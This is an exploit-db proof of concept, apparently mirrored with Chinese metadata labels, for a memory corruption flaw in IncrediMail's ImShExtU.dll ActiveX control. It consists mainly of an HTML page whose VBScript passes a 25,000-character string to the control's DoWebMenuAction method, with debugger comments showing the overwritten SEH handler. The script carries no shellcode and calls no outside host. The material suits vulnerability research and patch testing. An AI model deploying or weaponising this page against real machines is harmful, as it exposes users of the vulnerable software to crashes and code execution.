IncrediMail – ‘ImShExtU.dll’ ActiveX Memory Corruption

  • 作者: Lincoln
    日期: 2010-05-14
  • 类别:
    平台:
  • 来源:https://www.exploit-db.com/exploits/12605/
  • <html>
    <!--
    |------------------------------------------------------------------|
    | __ __|
    | _________________/ /___ _____ / /________ _____ ___|
    |/ ___/ __ \/ ___/ _ \/ / __ `/ __ \ / __/ _ \/ __ `/ __ `__ \ |
    | / /__/ /_/ / //__/ / /_/ / / / // /_/__/ /_/ / / / / / / |
    | \___/\____/_/ \___/_/\__,_/_/ /_/ \__/\___/\__,_/_/ /_/ /_/|
    ||
    | http://www.corelan.be:8800 |
    |security@corelan.be |
    ||
    |-------------------------------------------------[ EIP Hunters ]--|
    
    # Software: Incredimail (ImShExtU.dll)
    # Reference : http://www.corelan.be:8800/advisories.php?id=CORELAN-10-038
    # Author: Lincoln
    # OS: Windows
    # Tested on : XP SP3 En (VirtualBox)
    # Type of vuln: SEH
    # Greetz to : Corelan Security Team 
    # http://www.corelan.be:8800/index.php/security/corelan-team-members/
    #
    # Script provided 'as is', without any warranty.
    # Use for educational purposes only.
    # Do not use this code to do anything illegal !
    #
    # Note : you are not allowed to edit/modify this code.
    # If you do, Corelan cannot be held responsible for any damages this may cause.
    #
    #0013F1A4 41414141AAAA
    #0013F1A8 41414141AAAA
    #0013F1AC 41414141AAAAPointer to next SEH record
    #0013F1B0 41414141AAAASE handler
    #0013F1B4 41414141AAAA
    #0013F1B8 41414141AAAA
    #
    -->
    
    <object classid='clsid:F8984111-38B6-11D5-8725-0050DA2761C4' id='target' ></object>
    <script language='vbscript'>
    
    
    crash=String(25000, "A")
    target.DoWebMenuAction crash
    
    
    </script>
    <b><center>IncrediMail ImShExtU.dll ActiveX Memory Corruption</b></center>
    </html>